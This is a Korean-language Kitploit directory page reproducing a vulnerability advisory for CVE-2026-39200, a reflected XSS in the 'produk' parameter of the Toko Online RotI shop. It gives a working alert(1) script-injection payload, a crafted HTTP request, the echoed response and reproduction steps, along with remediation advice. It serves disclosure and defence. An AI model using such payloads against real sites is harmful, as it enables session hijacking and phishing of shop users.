Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39200 — produk 요청 매개변수의 값은 큰따옴표로 캡슐화된 HTML 태그 속성의 값으로 복사됩니다. 페이로드 xbnw0"><script>alert(1)</script>skc2h가 produk 매개변수에 제출되었습니다. 이 입력은 애플리케이션의 응답에서 xbnw0\"><script>alert(1)</script>skc2h로 에코되었습니다. | Kitploit
도구/GitHubGitHub/r00tali/cve-2026-39200
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPenetration TestingPapers & ResearchLearning & Education
GitHubr00tali/cve-2026-39200

CVE-2026-39200

produk 요청 매개변수의 값은 큰따옴표로 캡슐화된 HTML 태그 속성의 값으로 복사됩니다. 페이로드 xbnw0"><script>alert(1)</script>skc2h가 produk 매개변수에 제출되었습니다. 이 입력은 애플리케이션의 응답에서 xbnw0\"><script>alert(1)</script>skc2h로 에코되었습니다.

저장소 보기
131개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-39200 — Toko Online RotI의 반사형 크로스 사이트 스크립팅(XSS)

요약

Toko Online RotI 웹 애플리케이션의 produk 요청 파라미터에서 반사형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다. 이 애플리케이션은 사용자가 제공한 입력값을 큰따옴표로 묶인 HTML 태그 속성 내부에 반사하기 전에 HTML 인코딩하지 않습니다. 공격자는 악의적인 URL을 제작하여 피해자가 해당 URL을 방문할 경우 피해자의 브라우저 세션 컨텍스트에서 임의의 JavaScript를 실행시킬 수 있습니다.

필드값
CVE IDCVE-2026-39200
취약점 유형CWE-79 — 웹 페이지 생성 중 입력의 부적절한 중화(반사형 XSS)
영향받는 제품Toko Online RotI(인도네시아 온라인 스토어)
영향받는 파라미터produk
발견자Uzair Ali (r00tali) — 침투 테스터 / 버그 바운티 헌터
발견 날짜2026-07-03
CVE 배정2026-07-12
권고 게시2026-07-19

취약점 상세 정보

produk 요청 파라미터는 큰따옴표로 묶인 HTML 태그 속성의 값에 그대로 복사됩니다. 애플리케이션이 사용자 입력을 반사하기 전에 HTML 인코딩하지 않기 때문에, 공격자는 닫는 큰따옴표 뒤에 HTML/JavaScript 페이로드가 포함된 값을 제출하여 속성에서 벗어날 수 있습니다.

개념 증명(PoC) 페이로드

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

이 페이로드가 produk 파라미터로 제출되면, 애플리케이션은 입력값을 이스케이프하지 않은 채 응답에 그대로 반사합니다. 닫는 ">가 원래 속성을 종료하며, 주입된 <script>alert(1)</script> 블록은 브라우저에서 새로운 HTML 요소로 해석되어 사용자 세션에서 임의의 JavaScript를 실행합니다.

취약한 패턴(개념)

root@kitploit:~
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser executes this

HTTP 요청(재현)

root@kitploit:~
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0

HTTP 응답(발췌)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

재현 단계

  1. Toko Online RotI 애플리케이션에서 produk 파라미터를 HTML 속성 내부에 반사하는 엔드포인트를 식별합니다(예: 제품 검색, 상세 또는 필터 페이지).
  2. produk 파라미터 값을 다음 페이로드로 교체합니다:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. 서버에 요청을 전송합니다.
  4. 서버의 응답을 확인합니다. 페이로드는 속성 내부에 수정 없이 그대로 반사되어 "에서 벗어나 DOM에 유효한 <script> 요소를 생성합니다.
  5. 조작된 응답을 최신 브라우저에서 로드합니다. JavaScript alert(1) 대화상자가 표시되어 피해자 세션에서의 임의 JavaScript 실행을 확인할 수 있습니다.

영향

이 반사형 XSS를 성공적으로 악용하면 공격자는 다음을 수행할 수 있습니다:

  • 세션 쿠키와 인증 토큰을 탈취하여 계정 탈취로 이어지게 할 수 있습니다.
  • 인증된 사용자가 인지하지 못한 채 사용자를 대신해 작업을 수행할 수 있습니다.
  • 사용자를 악성 사이트로 리다이렉트(피싱/자격 증명 수집)할 수 있습니다.
  • 애플리케이션에 악성 콘텐츠를 주입(웹사이트 변조)할 수 있습니다.
  • 피해자가 입력한 키 입력과 양식 데이터를 캡처할 수 있습니다.
  • 드라이브바이(Drive-by) 악성코드 유포를 위해 브라우저 취약점을 악용할 수 있습니다.
  • 사용자와 애플리케이션 도메인 간의 신뢰 관계를 남용할 수 있습니다.

이 취약점은 반사형이므로 피해자가 조작된 링크를 클릭하기만 하면 악용이 가능하며, 피싱 캠페인에서 쉽게 무기화될 수 있습니다.

CVSS v3.1(추정치): 6.1(보통) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


해결 방안

이 취약점을 해결하기 위해 공급업체는 다음을 수행해야 합니다:

  1. HTML 출력에 반사되기 전에 사용자가 제공한 모든 값을 HTML 인코딩합니다. 특히 <, >, ", ', &를 인코딩합니다(예: &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. 수동 문자열 연결 대신 프레임워크에 내장된 출력 인코딩 헬퍼를 사용합니다. 예시:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) 또는 <%: %> 구문
    • Python(Jinja2): {{ input }}(기본적으로 자동 이스케이프)
  3. 남아 있는 주입의 영향을 제한하기 위해 엄격한 CSP(Content-Security-Policy) 응답 헤더를 설정합니다:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. JavaScript가 쿠키를 읽지 못하도록 모든 세션 쿠키에 HttpOnly 및 Secure 플래그를 설정합니다.
  5. 예상되는 제품 식별자(숫자 ID, 슬러그 등)의 허용 목록(allow-list)을 기준으로 produk 파라미터를 검증하고 일치하지 않는 값은 거부합니다.
  6. 응답 본문의 MIME 타입 스니핑을 방지하기 위해 X-Content-Type-Options: nosniff를 추가합니다.

공개 타임라인

날짜이벤트
2026-07-03권한이 부여된 보안 테스트 중 취약점 발견
2026-07-03cveform.mitre.org를 통해 MITRE에 CVE ID 요청
2026-07-12MITRE Assignment Team이 CVE-2026-39200 배정
2026-07-19보안 권고 공개

발견자

** Uzair Ali (r00tali)** — 침투 테스터 / 버그 바운티 헌터 / 보안 연구원

  • GitHub: https://github.com/r00tali

참고 자료

  • OWASP — 크로스 사이트 스크립팅(XSS)
  • CWE-79: 웹 페이지 생성 중 입력의 부적절한 중화
  • PortSwigger — 반사형 XSS
  • MITRE CVE 레코드 — CVE-2026-39200

면책 조항

본 보안 권고는 교육 및 방어 목적으로만 게시됩니다. 이 취약점은 MITRE CVE Assignment Team을 통한 책임 있는 공개(Responsible Disclosure) 절차로 신고되었습니다. 공급업체의 기밀 정보, 고객 데이터 또는 독점 코드는 공개되지 않습니다. 개념 증명은 무해한 alert(1) 페이로드를 사용하며, 실서비스에 대한 공격을 용이하게 하기 위한 것이 아니라 버그의 존재를 입증하기 위한 것입니다.

도구 다운로드